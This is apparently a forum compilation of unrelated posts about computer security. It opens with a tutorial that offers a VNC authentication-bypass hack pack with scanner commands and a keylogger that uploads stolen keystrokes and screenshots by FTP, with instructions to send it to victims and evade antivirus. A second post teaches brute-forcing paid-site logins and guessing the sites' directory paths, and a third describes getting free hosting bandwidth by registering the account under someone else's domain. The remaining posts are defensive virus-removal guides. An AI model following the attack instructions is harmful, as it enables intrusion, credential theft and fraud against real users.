Hey everyone! In this tutorial I am going to teach you how to hack computers with two extremely good methods! - VNC and Keylogin! ( i include my own private undetected keylogger!)
First off, the disclaimer. This information is dangerous and the methods illegal, and even there is almost no
chance of getting caught, i am not responsible for the damage you do, the laws you break, and the people you hurt!

so, on with the tutorial!!!
first, here r the downloads:
The VNC Hack Pack - http://rapidshare.com/files/37284802/vnc_hack_pack.zip
The Keylogger - http://rapidshare.com/files/37284935..._keylogger.zip
First one is to hack random computers! To start off, there is a program called VNC that lets people remotely
control their computers. It uses password authentication, but there is an explot where u can connect to the
VNC server without logging in and therefor control the computers and spy on users, get credit cards, logins, etc!!
BTW: 1) if you dont understand the vnc hack, i included a video so you can watch it being done!
2) antivirus systems pick these hacking programs up as trojans, keyloggers, spyware, adware, bots, rootkits, etc.
ask any hacker, they do this to try to stop people from using them. sometimes they just delete them right when
they are downloaded. if your a/v picks it up, ignore it. if you dont trust me, fuck off, you miss out anyway.
So first, we need vulnerable hosts. At the end I included a list of about 1500 computers that u can hack! theyre all tested about
2 days ago, so they ALL WORK! However, if u get bored of those 1500 computers, you can use this program to scan for more.
its included in the VNC_Hack_Pack folder. Its called:
VNC_bypauth_scaner.exe
we can use this command:
VNC_bypauth_scaner.exe -i SINGLE/range ip -p port (communly 5900) -vnc (to specific vnc scan) -vv (to show vuln ip)
exemple 1: VNC_bypauth_scaner.exe -i 192.168.0.2 -p 5900 -vnc -vv
exemple 2: VNC_bypauth_scaner.exe -i 192.168.0.1-192.168.0.254 -p 5900 -vnc -vv
exemple 3: VNC_bypauth_scaner.exe -i 192.168.0.1-192.168.0.254 -p 5900,5800 (scan 2 port) -vnc -vv

so when we use VNC_bypauthscaner.exe" -i 199.85.0.0-199.86.0.0 -p 5900 -vnc -vv
we are scanning all ip addresses from 199.85.0.0 to 199.86.0.0 on port 5900. after a while you should be able to
get a nice list of vulnerable hosts. There are also bots that do this, but thats beyond the scope of this tutorial.
Next is the fun part - CONNECTING!
I have two hacked clients. THe first is labeled NEW_VNC_Hack_Viewer. This was coded by a member of the very respected
h4cky0u community. It works on most computers, but not all. Basically, you start the program, put the ip in, and a screen
pops up of their computer and u can control it like your own! Sick, isnt it?
THe other client is labeled OLD_VNC_Hack_Viewer. This is an old copy. IT works for some computers, but the new version I have included
works on MANY MANY more computers. Anyway, if the new one doesnt work, try this oen and it will work, but I cant guarantee it will
give you access to the computer.
Now you can hack thousands of computers!
Now for the more advanced method. This has to do with hacking an individual computer you are targetting, such as a friends or
companys. This has to do with using a keylogger. I found a very good keylogger from a friend and modded the code a bit to give
it more functions and make it totally undetected as of the moment.
The functions in the keylogger are:
FTP log uploading
Windows User\Pass logger
Chat logger
General Key Logger
Screenshot taker
So heres how this hack will go. Go to the keylogger folder. Now you should see two files: core.exe and keylogconfig.exe
dont click core, its the keylogger you will send. but first, we need to configure it with keylogconfig.exe
So click keylogconfig.exe. Input you ftp login details that the keylogger will be using to upload the logs to,
( you can register for a free account at phpnet.us), the name of the keylogger you are making(anything) , and check the
checkboxes for whichever settings you want. Then click create, and it will ouput
the new keylogger to the name you gave. *DO NOT RUN THS FILE, IT WILL LOG YOUR OWN COMPUTER!!*
Now, send it to your victim over aim or msn, etc. This is at the time undetected and very small and not suspicious, but
if after months people leech it and it becomes detected, just use programs and crypters such as TheMida and CryptDaemon
to make it undetected again.
Now, once the person typing on the computer has inputted 1MB of letters and the keylogger has taken atleast 5 screenshots ( theyre take one our apart each)
it will upload the files to the server for you to examine! THen you have all the users information!!
So, I hope you like this tutorial. Have fun hacking!
and heres the list of all the ips you can hack with vnc!:

What are viruses.
Viruses are "programs" that modify other programs on a computer, inserting copies of themselves. Viruses are not distinct programs - they cannot run on their own, and need to have some host program, of which they are a part, executed to activate them.
Varieties.
Stealth Virus:A stealth virus has code in it that seeks to conceal itself from discovery or defends itself against attempts to analyze or remove it. The stealth virus adds itself to a file or boot sector but, when you examine, it appears normal and unchanged. The stealth virus performs this trickery by staying in memory after it is executed. From there, it monitors and intercepts your system calls. When the system seeks to open an infected file, the stealth virus displays the uninfected version, thus hiding itself.
Macro viruses:Macro languages are (often) equal in power to ordinary programming languages such as C. A program written in a macro language is interpreted by the application. Macro languages are conceptually no different from so-called scripting languages. Gnu Emacs uses Lisp, most Microsoft applications use Visual Basic Script as macro languages. The typical use of a macro in applications, such as MS Word, is to extend the features of the application. Some of these macros, known as auto-execute macros, are executed in response to some event, such as opening a file, closing a file, starting an application, and even pressing a certain key. A macro virus is a piece of self-replicating code inserted into an auto-execute macro. Once a macro is running, it copies itself to other documents, delete files, etc. Another type of hazardous macro is one named for an existing command of the application. For example, if a macro named FileSave exists in the "normal.dot" template of MS Word, that macro is executed whenever you choose the Save command on the File menu. Unfortunately, there is often no way to disable such features.
Linux/Unix:The most famous of the security incidents in the last decade was the Internet Worm incident which began from a Unix system. But Unix systems were considered virus-immune -- not so. Several Linux viruses have been discovered. The Staog virus first appeared in 1996 and was written in assembly language by the VLAD virus writing group, the same group responsible for creating the first Windows 95 virus called Boza.
Like the Boza virus, the Staog virus is a proof-of-concept virus to demonstrate the potential of Linux virus writing without actually causing any real damage. Still, with the Staog assembly language source code floating around the Internet, other virus writers are likely to study and modify the code to create new strains of Linux viruses in the future.
The second known Linux virus is called the Bliss virus. Unlike the Staog virus, the Bliss virus can not only spread in the wild, but also possesses a potentially dangerous payload that could wipe out data.
While neither virus is a serious threat to Linux systems, Linux and other Unix systems will not remain virus-free. Fortunately, Linux virus writing is more difficult than macro virus writing for Windows, so the greatest virus threat still remains with Windows.
Signs of virus infection.
* You get confirmations for e-mails you did not send.
* Your system seems unusually slow or certain programs will not run.
* You have hardware problems such as stuck keys that repeat the same character over and over, keyboard locking in CAPS mode, black rectangles appearing on the screen at random, system lock-ups, etc.
* You have software problems such as program lockups for no reason, menu items react strangely, mode indicators like "CAPS LOCK" stop working, etc.
* Error messages like "Incompatible file error" or "Not enough memory," appear for no apparent reason.
* You get unusual messages on your monitor, such as "Hacked by Chinese".
Actions if you are infected.
* Turn off your computer. DO NOT click Start>Shut Down>Shut Down the Computer. That takes too long. Simply push the power button and hold it until the computer shuts off. This will prevent continued spread of the virus.
* Inform your IT department immediately and let them handle the problem. Do not panic or interrupt other users.
* What if your company does not have its own IT department? What if you are infected with a virus on your home PC? What should you do?
* The first thing to do when you realize you are infected is to disconnect your computer from your Internet connection. This will limit the spread of the virus. If you have an "always on" connection, such as a network, cable modem, or DSL, physically unplug the connection from your PC.
* If your virus definitions are up to date and you simply neglected to scan an attachment, scan it now to determine which virus has infected your computer.
* If you need to update your definitions in order to scan for the virus, try to download the definitions using another computer and transfer them to your PC using diskettes or a CD.
* Once you have determined the name of the virus, find the removal instructions on the website of your anti-virus software (again, using another computer), and follow them step-by-step. It is very important to follow the instruction precisely. If you skip a step, you can exacerbate the problem. Be very careful when making changes to the registry and other system files. You can inadvertently do more damage than the virus if you delete the wrong file.
Free online scan.
1. PCPitstop AntiVirus Online Scan: http://www.pcpitstop.com/antivirus/avload.asp
2. Trend Micro's free online (Housecall) virus scanner: http://housecall.trendmicro.com/
3. Panda ActiveScan Online Virus Scan: http://www.pandasoftware.com/activescan/com/activescan_principal.htm
4. Symantec's Online Scan: http://security2.norton.com/
5. BitDefender Free Online Virus Scan: http://www.bitdefender.com/scan/licence.php

CRACKING XXXX SITES Tutorial BY WIGGAZRHYMES
HERE ARE MY TWO TUTORIALS ON CRACKING XXXX SITES AND HOW TO BREAK INTO EMAIL ACCOUNTS! OK WE WILL START OFF WITH XXXX SITES FOR ALL YOU DIRTY BASTARDS OUT THERE LOL I HOPE YOU ENJOY THEM BOTH AND IF YOU HAVE ANY QUESTIONS ON THE SUBJECT MY YAHOO ID IS WIGGAZ_RHYMES_6969 CHEERS ALL
ONE MORE THING
I CHOOSED TO DO THESE TWO SUBJECTS COS IF YOU HAVE EVER BEEN INTO A HACKERS CHAT ROOM. ALOT OF THE PEEPS WHO COME IN THERE,ALWAYS DRIVE THE HACKERS MAD WITH THOSE TWO REQUESTS HOW DO YA GET IN SOMEONES EMAIL ACCOUNT ? OR HOW DO I GET A XXXX SITE FOR FREE SO THAT I CAN HAVE A QUICK HAND SHUFFLE FOR FREE IMAOOOOOOO

CRACKING XXXX SITES
I WILL BREAK THIS DOWN INTO 2 SECTIONS COS THERE IS REALLY ONLY TWO WAYS OF CRACKING XXXX SITES
SECTION ONE WILL BE CRACKING XXXX SITES BY BREAKING INTO AN EXISITING MEMBER ACCOUNT AND SECTION TWO WILL COVER TRAVERSING THROUGH THE INTERNAL DATA BASE VIA A REDUNDANT DIRECTORY SCHEME OK LETS GO FOR IT

SECTION ONE YOU ARE GONNA NEED OF COURSE A PASSWORD CRACKER I WOULD RECOMMEND ACCESS DIVER, JUST DO A GOGGLE SEARCH AND YOU WILL FIND IT ITS FREE SO DONT WORRY LOL OR YOU CAN USE BRUTUS OR WHAT EVER YOU PREFER
THE "TARGET" IS OF COURSE IS THE REMOTE SERVER (IN THIS CASE A WEB SERVER) THAY YOU WILL BE TARGETING "TYPE" IS THE TYPE OF SERVICE THAT THE SERVER IS RUNNINGTHAT YOU ARE WANTING TO BREAK INTO HTTP SHOULD ALREADT BE SELECTED ON YA CRACKER ANS THATS THE SERVICE U WILL BE CRACKING OK I HOPE YOU ARE UNDERSTANDING THIS SO FAR LOL

RIGHT NOW FOR THE TARGET GO TO THE XXXX SITE YOU WANNA CRACK THEN GO TO THE ICON THAT BRINGS YA TO THE MEMBER SECTION LOGIN OK RIGHT CLICK THAT ICON AND SELECT "PROPERTIES" YOU WILL WITHIN PROPERTIES SEE THE "ADDRESS" FOR THE LOGIN YOU WANT TO CRACK SO JSUT COPY AND PASTE IT AND ADD THE ADDRESS INTO THE TARGET BAR ON YOUR CRACKER NOW WE HAVE THE TARGET SELECTED YOU ARE GONNA NEED TO CHECK THE "USE PROXY" BOX AND CLICK "DEFINE" TO USE A PROXY SERVER WITH OUR CRACKER (DONT WORRY ACCESS DIVE CAN SORT THE PROXY BIT OUT AS WELL) OR JUST USE A WORKING PROXY THERE ARE PLENTY OF WAYS TO GET YA PROXY ONCE YOU HAVE THE PROXY CUT AND PASTE THE IP NUMBER ONTO YOUR CRACKER AND DONT FORGET TO ENTER THE PORT NUMBER(DEFAULT NUMBER IS 1080)

OK NOW WE HAVE TAKEN CARE OF THAT PART WE ARE GONNA NEED A WORD LIST OK JUST TO MAKE IT SIMPLE THE CRACKER WILL COME WOITH A WORD LIST AND USE THAT OR USE YOUR OWN LIST WHAT EVER YOU PREFER OK TO MAKE IT SIMPLE FOR YOU SIMPLY DEFINE THE USER FILE AS THE WORD LIST. I TELL YA WHY THAT IS COS I CAN BET YA BOTTOMS DOLLAR THAT ON EVERY XXXX SITE YOU WILL GET AT LEAST ONE MORON OR DUMMY AS I CALL IT LOL THAT CHOOSES HIS PASSWORD AS HIS USER NAME LOL OR YA CAN TAKE YA TIME AND DO DIFFERENT COMBINATIONS FILE BASED ON WORDS WITH THE USER LISTS, WITH PARAMETERS THAT ARE USUALLY FOUND ON SUCH SITES

THERE ARE BASICALLY TWO TYPES OF REDUNDANDANT PASSWORD SCHEMES THAT YOU WANT TO LOOK FOR WHEN BREAKING IN TO MEMBER ACCOUNT ON A XXX SITE SO FOR EXAMPLE wiggaz : wiggaz and with variations like wiggaz1 : wiggaz so after all that is done just let it rip and press start on the cracker
if you have the patience , and time, then you will get results thats the end of section one section two : figuring out the directory scheme will follow shortly thank you
Section two - FIGURING OUT THE DIRECTORY SCHEME
THIS PART WILL BE SHORT AND SWEET LOL CONSIDERING THE METHOD IS RATHER OBIVIOUS THERE IS ACTUALLY A WAY YOU CAN VIEW MATERIAL FROM WITHIN THE SITE ITSELF,WITHOUT BREAKING INTO AN EXISITING MEMBER ACCOUNT
THIS IS POSSIBLE ONLY ON SOME SITES SUCH AS SITES WITH A FAIRLY STANDARD DIRECTORY SCHEME FOR STORING THERE MATERIAL SITES SUCH AS WWW.THEHUN.NET (http://www.THEHUN.NET) OFFER FREE PREVIEWS INTO DIFFERENT XXXX.SITES
DIFFERENT SITES CONTRIBUTE PREVIEW PAGES TO THE SITE.TO GIVE POTENTIAL MEMBERS A PREVIEW OF THE MATERIAL WITHIN.HOWEVER,THESE PREVIEW PAGES ARE SET UP WITHIN THE INTERNAL DATABASE OF THE SITE. THIS ALLOWS US TO GET A PREVIEW OF MUCH MORE THAN THE ADMINSTRATOR WOULD WANTS US TO LOL. LIKE A LOOK INTO THE DIRECTORY SCHEME UTILISED WITHIN THE PORN SITE.......

SECTION TWO FIGURING OUT THE DIRECTORY SCHEME CONTD
NOW MOST ADMINISTRATORS WILL BE SMART ENOUGH TO RANDOMIZE THEIR DIRECTORY SCHEME,SO THATS THE ONLY WAY TO REALLY TO TRAVERSE THROUGH THE DIRECTORIES,IS TO GO THROUGH THE MEMBER SECTION,HOWEVER MANY OTHER SITES USE A INCREMENTIAL DIRECTORY SCHEME,WHICH ALLOW FOR ONE TO VERY EASILY TRAVEL THROUGH THE INTERNAL DATABASE.FOR EXAMPLE SAY THE ADDRESS IS SOMETHING LIKW PORN.SITE.ADDRESS/SOME_OTHER_DIRECTORY_PATHS/34/ WHEN YOU CLICK THE PREVIEW PAGE WELL WE CAN SIMPLY INCREMENT OR DECREMENT THE NUMBERED DIRECTORY,TO TRANSVERSE THROUGH THE INTERNAL DARABASE (IE /33/32 ETC)
WE CAN TRY THIS WITH ANY NUMERICAL DIRECTORY SCHEME THAT IS IN PLACE T POTENITALLY TRANSVERSE THROUGH THE INTERNAL DATABASE.
YOU JUST HAVE TO USE YOUR BRAIN LOL

CONCLUSION
WELL THAT ABOUT COVERS THE TUTORIAL I HOPE YOU ENJOY IT
YOU SHOULD KNOW ENOUGH TO START BREAKING INTO XXXX SITES AND MAYBE GET INTO THE WHOLE XXXX CRACKER SCENE AND START SUBMITTING PASSWORDS UP ON THE CRACKER FORUMS BUT THATS ALL UP TO YOU ANYWAYS UNTIL NEXT TIME WHEN I WILL DO THE BREAKING INTO EMAIL ACCOUNTS WHICH IS MORE COMPLEX IN MY VIEW BYE FOR NOW

Manually Removing PC Viruses
Author: Anthony
Have you ever been in the possition that you know you have an virus but you dont have any antivirus?? Its almost impossible to remove it manual without knowing about a few tips & tricks.
After reading this turtorial im sure you will know how to manual remove most of the virus lurking around. But that dosnt mean you shouldnt have any anti virus on you computer!
Anyway, lets get starting with the turtorial.. I suppose you already know what safe mode is. If you dont try pressing the F8 key some times when you start your computer. You havto do this when your computer is about to start the first windows components. In win2k or xp i think you can press space and then F8 when it ask you if you want to go back to previous working setting.
Enough talk about how to start you computer in safe mode, but if you want to manual remove viruses you almost everytime haveto do this in safe mode becouse in safemode most viruses dosnt start. Only some few windows component is allowed to run in safemode. So here is what to do.
Step: 1: Start your computer in safemode.
2: If you know where the virus are hiding delete the executable file.
3: Open the registry and go to the keys below and add an : in front of the value of the string that you think its the virus. Like this, if string is "virus" and its value is "c:\virus.exe" change its value to ":c:\virus.exe". The : is like comenting out the value. But if you are sure its the virus you can just delete the string.
Here are the keys you maybe want to look at:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServicesOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Runonce
4: The virus can start itself from some other places to. win.ini is the most common files that viruses can use. Soo you should find the files named win.ini and system.ini and look through them and see if you find anything.
5: Look through the startup folder that is normaly located in your profile directory \Start Menu\Programs\Startup.
6: Try searching for the virus executable to see if its hiding some other place.
7: Finally look through the list of services that windows is running. This list is often located under control panel - administrative tools - services. After this 7 steps just reboot your computer in normal mode and try to figure out if the virus is still there.. If not SUCCESS if yes, try to go back to safe mode and hunt some more. Off course this 7 steps will not work on every virus out there, but many of them.

-Be carefull with the registery, dont mess it up, depends on wat u mess up, i suggest u made a system restore point first, so incase someting happens you can go back on it

sorry for the thread title it must be ulukaits usefull collections.tnx

NOTE: This applies only to specific hosting companies, due to the specific setup needed and does have its drawbacks.
While setting up hosting space with a specific company I often deal with, I noticed that they used a shared IP. (IP shared by two or more websites/domains.) Well, the rates for unlimited bandwidth were around $50+ per month, which I found unreasonable. I didnt require much space, and didnt want to be limited to a mere 3 gig of traffic per month.
Back on track... When setting up the acct, the hosting company needs to know the domain name so that they can direct it accordingly. (example: http://www.123.4.567.890/~user1/ , http://www.123.4.567.890/~user2/ etc)
At this point you can give a url that doesnt belong to you at all. As long as the nameservers dont change, that should have absolutly no negative effects on you or your site whatsoever.
How it works is this:
The host propogates you a certain amount space on its servers, and monitors the traffic that enters their space through the domain its registered under. Being that the domain isn't connected to the site at all, it registers ZERO traffic.
Zero traffic registered = can't possibly go over bandwidth restrictions
Can't possibly go over bandwidth restrictions = free unlimited bandwidth
Now the problems with this (besides the ethical ones) is that your host may offer X amount of mail addys with the acct (you@yourname.com) and these will not work, as the name isnt on their DNS. However, some domain companies allow you to set it up regardless. Another problem seems to be strictly cosmetic, but can be highly problematic... Once you attach the domain you want onto the site, each page comes up/w the ip/UN the host propagated to your acct. Its at this point where you have to have a phenominal 10-15 character alphanumerical or better (#, &, etc) pw, or your site will be vulnerable to attack since the attacker already has your UN. This only gives attackers a slight advantage as the amount of time it would take to brute force a 10 character pw @ a rate of 1,000,000 per second is 10 years. Add numbers and case sensitivity to that and it becomes approx 26,980 years.
While I'm on it, I may as well add that if you use this method, obviously you are going to be using the lowest cost hosting plan available, which in turn will offer the least amount of space. Thats why free hosts were invented.
Free hosts suck as a general rule. Who wants a site smothered in ads? However, if you upload all your programs, graphics and other large files (have a backup of course) to a reliable free host and target them accordingly from your site you have just freed up a signifigant amount of space. The only setback/w this is having to keep an index card or file around/w your pws, as you should never use the same one twice, and want to use complicated ones. (who wants their banner to read, "hacked by Mr 1337"?)

bkit nakadelete n ung file?

It's a good practice not to use the same password on everything. This is because if your ONLY password falls in the wrong hands, the next thing you know is you won't be able to access anything at all. Imagine you loose access to your Hotmail, GMail, Yahoo, Windows Live Messenger, Yahoo Messenger, Google Talk, Internet Bank account and etc within a day! You'll go crazy loosing all your contacts and you know someone is having a great time reading all your personal emails.
For me, I use different password for softwares/websites and most of it is saved on my laptop for easy access. Problem is, if you use too many different passwords, sometimes we tend to forget the password that we set for the software or website. If the password is saved, you can easily use a tool to show the password hidden under the asterisk *******
I am sure many of you remember "SnadBoy's Revelation" but unfortunately it doesn't support showing passwords hidden under asterisks in web pages. So I won't be recommending this tool because I know a better one.
Asterisk Key shows passwords hidden under asterisks. It is able to instantly uncover hidden passwords on password dialog boxes and web pages. The setup is less than 500KB and it works perfectly.
Reveal hidden password in Google Talk (Software)

http://www.raymond.cc/images/gtalk-password.png
Reveal hidden password in Internet Explorer (Web Page)
http://www.raymond.cc/images/web-hidden-password.png
Both Google Talk and Internet Explorer is active. I then launch Asterisk Key and click the "Recover" button. Within a second, Asterisk Key shows the passwords hidden under asterisks.

http://www.raymond.cc/images/asterisk-key.png


Just a word of advice, please use this tool to recover your OWN password. If you get caught in using this tool to steal people's password, you can get into serious trouble. Treat this tool as a useful recovery too instead of hacking tool.
Note: Asterisk Key doesn't reveal password hidden under asterisk in Firefox browser. I will be posting a method on how to recover saved passwords in Firefox browser tomorrow. Stay tuned!

Windows Service is an application that starts when the Microsoft Windows operating system is booted and runs in the background as long as Windows is running. It is very similar in concept to a Unix daemon. By default Windows services are run under the virtual user "LocalService" that has administrative rights on the system. LocalService is not a real user and also has no access to network file shares and similar resources.
Some spyware installs autorun entries in Windows Services. So it's important that you know what's Windows Services and how to access it. You can view the services installed on your Windows computer by launching "Services" from the Windows Control Panel, Administrative Tools.
http://www.raymond.cc/images/windows-services.png
You'll see a long list of Name, Description, Status, Startup Type and Log On As information. The problem with Windows Services is that its difficult for the user to distinguish between legitimate and non-legitimate services. Also information about the service is not displayed at single place.
Here's a free tool that makes it easy for user to identify non-legitimate services by displaying additional information such as binary path, company information at one place.
WinServiceManager provides single point of administration for managing various aspects of windows services. It has got more features and provides better management functionality than built-in windows service management console. It shows list of non-legitimate services which allows the administrator to quickly identify and remove the additional services, most of these are installed by spyware to monitor the user activities.
http://www.raymond.cc/images/windows-service-manager.png
This is very simple tool which does not require any installation. It is portable and you can run the executable from anywhere. On launching this application you will see the screen as shown in the above picture. By default it displays only non-windows services. To see all the services, click on "Show Windows services also" at the bottom-left side of the screen. For each service, it displays following information
Service Name
Description
Current Status of Service
Full path of binary file
Company Name
Anytime you can start, stop or disable any service by selecting it and clicking on the appropriate button below. Also you can reload the service list by clicking on "Refresh" button. I'd say that this is one of the best FREE tool for managing Services in Windows.

download here:

http://securityxploded.com/download/WinServiceManager.zip

Many worms and trojans make changes to the registry to so that it can automatically start whenever you boot up your computer and also to avoid easy detection by disabling Windows Task Manager, Registry Editor and etc... You can easily restore all those tools by using Remove Restriction Tool (RRT).
I just recently found out that a virus can actually make some changes on your registry so that the virus will run automatically whenever you execute a file. Imagine, the virus will be loaded each time you run an executable (EXE) or a batch (BAT) file. Just last week I was cleaning a computer that was infected by Brontok. After finished scanning, cleaning the virus and restoring the changes made by virus, the Symantec Antivirus Corporate Edition still pops up notification stating that Brontok virus is found and automatically deleted. This happens EVERY TIME I run an executable file.
Now I found out how it works and also how to disable the virus from running automatically whenever I run any file.
This happens when a virus change one or more of the shell\open\command keys. If these keys are changed, the worm or Trojan will run each time that you run certain files.
For example, if the \exefile\shell\open\command key is changed, the threat will run each time that you run any .exe file. This may also stop you from running the Registry Editor to try to fix this. They may also change a registry value so that you cannot run the Registry Editor at all.
I've done a test by adding Notepad.exe path in \exefile\shell\open\command key. Then I tried running any EXE file, it will launch the EXE file with notepad! For Brontok virus, it loads a backdoor file called "shell.exe". You won't even notice anything abnormal when you run an EXE file.

http://www.raymond.cc/images/shell-open-command.png
Thanks to Symantec Security Response for creating a script that is able to easily reset these registry values to their default settings.
What is inside the script:
[Version]
Signature="$Chicago$"
Provider=Symantec
[DefaultInstall]
AddReg=UnhookRegKey
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe ""%1"""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \System,DisableRegistryTools,0x00000020,0
Of all the shell\open\command keys, the exefile key is being used most frequently. When your computer starts, it loads a lot of EXE files. When you start a program, it also loads EXE file. The rest are seldom used unless you're a power user. To be on the safe side, it's better for Symantec to restore all of the shell\open\keys to default values.
Instructions to install the script:
1. Download the script at the end of this post by right-clicking on the link and save it to your desktop.
2. Right-click on the file and select "install"

http://www.raymond.cc/images/install-unhookexec-inf.png

A great tool to carry around with me all the time to combat against nasty virus such as Brontok.

DOWNLOAD HERE:
http://securityresponse.symantec.com/avcenter/UnHookExec.inf

I've been helping people to remove trojan, virus, spyware and unnecessary programs from Windows startup for many years now. It's very interesting because you will learn the Windows startup methods from finding out where will the program be hidden. The old method by running System Configuration Utility(msconfig) doesn't work so well now because there are many other ways to start the programs when Windows is being booted up without being displayed in System Configuration Utility(msconfig). Even some smart trojans are hidden from Task Manager, Processes tab.
Spywares, it is by nature to create random filenames and file sizes so avoid detection. That is why you always need 2-3 antispywares to completely remove spywares. Using anti-spyware software such as Ad-Aware, SpyBot and XoftSpy is good to identify spyware files but I can assure you that it's not smart enough to 100% completely remove trojan, virus or spyware from startup. For example, one of my friend's computer has been infected by spyware because everything is so slow. I find it hard to even download, update or copy the anti-spyware scanners to the computer. However, I manage to copy the updated anti-spyware software to the computer, scanned it, and removed the potential infections. I restarted the computer and it is still slow. That shows that spyware is still being ran during startup.
I am going to show you one of the best way to remove trojan, virus or spyware from startup but it requires you have at least some knowledge in computers, otherwise you'll be removing the wrong startup programs which may cause the Windows to be unbootable.
HijackThis is a general homepage hijackers detector and remover. Hijackers are spywares, trojans and viruses. They infect your computer without your knowledge.
http://www.raymond.cc/images/hijackthis.gif
Initially based on the article Hijacked!, but expanded with a lot of other checks against hijacker tricks. It is continually updated to detect and remove new hijacks. It does not target specific programs/URLs, just the methods used by hijackers to force you onto their sites.
As a result, false positives are imminent, and unless you are sure what you're doing, you should always consult with knowledgeable folks from forums before deleting anything or you can go a Google search on the filename to know if that file is a virus.
There are 2 types of scan methods.
1. Do a system scan and save a logfile.
- This is for newbie who doesn't want to mess around with their computers. It will scan your computer and create a hijackthis.log file which you can paste it to forums and request for help.
2. Do a system scan only.
- Same as first method but it doesn't create log files. Mostly for advance user who would like to troubleshoot themselves.
Again I would like to stress out that IF you're unsure what to fix after running the scan, please request for help in forums. Simply removing any startup programs would result in an unbootable Windows.

Let's face it. All of us have been infected by virus before. Even if you have anti-virus installed, you can still be infected by a new or custom virus that is not recognized by your anti-virus. Sometimes after removing the virus completely from our system, you'll face new problems such as you can no longer bring up Windows Task Manager from CTRL+ALT+DEL. You get the error message saying "Task Manager has been disabled by your administrator".You think that it's easy to fix this problem by going to Registry Editor but you can't! You get the error message "Registry editing has been disabled by your administrator".
http://www.raymond.cc/images/taskmanager-error.png
http://www.raymond.cc/images/regedit_msg.png
Folder Options and even Show Hidden Files & Folder is disabled! How frustrating! Don't worry, here's how to restore your Windows Task Manager, Registry Editor, Folder Options and Show hidden files & folders.
This problem is most commonly caused by a virus called "Brontok". Brontok virus will make some changes to the system restrictions in order to hide itself from easy detection and also from easy cleaning.
Here's a free tool called Remove Restrictions Tool (RRT) which is able to re-enables all what the virus had previously disabled, and gives you back the control over your own computer.
http://www.raymond.cc/images/remove-restriction-tool.png
Remove Restrictions Tool is able to re-enable:
- Registry Tools (regedit)
- Ctrl+Alt+Del
- Folder Options
- Show Hidden Files
Small and easy to use. Make sure you boot in to Safe Mode to use Remove Restrictions Tool (RRT). Just click on the buttons and it'll do it's job.

DOWNLOAD HERE:
http://download.sergiwa.com/security/RRT.exe

One of the main reason why some people would like to clear their Google search history from web browser and Google Toolbar is to maintain their privacy. If you own your own desktop or laptop which is used only by you, then it's fine. But if your computer is shared with a few people, sometimes it's just not nice to let them "accidentally" find out what you were looking for. An example below would be embarrassing.
http://www.raymond.cc/images/google-search-history.png
Here's how you can clear Google's search history from Firefox, Internet Explorer and Google Toolbar for Firefox and Internet Explorer.
The below instruction A and B is for deleting search history from the Google home page search box. This is if you use either Firefox or Internet Explorer and manually type in Google.com address to perform the search.
A. Internet Explorer 7
1. Go to Tools menu
2. Select Options
3. On General tab, click on the "Delete..." button from the Browsing History area.
4. Click "Delete forms..." button from the Form data area.


http://www.raymond.cc/images/IE-clear-form-data.png
5. Click Yes to confirm.
B. In Mozilla Firefox
1. Go to Tools menu
2. Select Options
3. Select the "Privacy" tab
4. On the Private Data area, click on the "Clear Now..." button.
5. Make sure the "Saved Form and Search History" is checked and click on the Clear Private Data Now.


http://www.raymond.cc/images/firefox-clear-private-data.png
The below instruction C and D is if you have Google Toolbar installed on your Firefox or Internet Explorer browser.
C. Internet Explorer with Google Toolbar
1. Click on the Google logo on the Toolbar to access the drop-down menu.
2. Select the "Clear History" option.
http://www.raymond.cc/images/IE-google-toolbar-clear.png
C. Firefox with Google Toolbar
1. Click on the Google logo on the Toolbar.
2. Select "Clear Search History" option.
http://www.raymond.cc/images/Firefox-google-toolbar-clear.png
As you can see, clearing search history from Google Toolbar on Internet Explorer and Firefox is slightly a bit different. Not sure why they made it that way... Although it seems easy to clear Google search history, I did not immediately knew where to clear Google search history in Firefox Google Toolbar. I was searching through the options and the drop-down but I missed clicking the Google logo where the "Clear Search History" option is.

There are so many free system information utility now. Some of the popular ones are CPU-Z, PC Wizard and Everest. However, most of those system information utility list out a lot of useless memory address and unnecessary information which not many people would understand.
So here's "System Spec". A utility to produce a specification of your system's hardware and software and lists a specification of your Windows PC without listing lots of useless memory address and unnecessary information. This tool doesn't require any installation. Just download and run the single executable file.

http://www.raymond.cc/images/system-spec.png

With System Spec you can see, save and print a complete spec of your PC. This no-install, system information utility can also perform various windows functions. Additional advanced info includes CPU, drives, applications, display, memory, networking, internet, CD / DVD drives and more.
System Spec is able to extract Main System Info, Personal Info, Memory, Display, Drives, CPU, Internet, Programs, Network, Adapter, and Sound information from your computer. As you can see, depending on your needs, it can be very basic and it can be advanced as well.
System Spec has the ability to display the serial number used to install your Windows.
http://www.raymond.cc/images/system-spec-windows-cd-key.png
Thankfully when you export to HTML, it doesn't export the serial number like what Belarc Advisor does. Belarc Advisor program exports the Windows product key into the HTML and surprisingly, you can easily search for it and illegally use other people's Windows product key. I have no idea how did the HTML ended up on a webserver on the first place.
There's some very useful keyboard shortcut built-in to the program. If you press CTRL+C simultaneously on the program, you will get the message "System information copied to clipboard". This means that the basic information displayed on System Spec are copied to clipboard. If you open a notepad and press the key CTRL+V to paste, it will paste the information to your notepad. You can also save your system information to CSV by pressing F2. Printing the full spec only requires you to press CTRL+P.
Note: The author of System Spec mentioned that McAfee antivirus might report System Spec as backdoor trojan. I've tried scanning with VirusTotal and none of the antivirus reported anything suspicious. Most probably McAfee has fixed the false alarm.

DOWNLOAD HERE:
http://www.alexnolan.net/software/SysSpec.zip

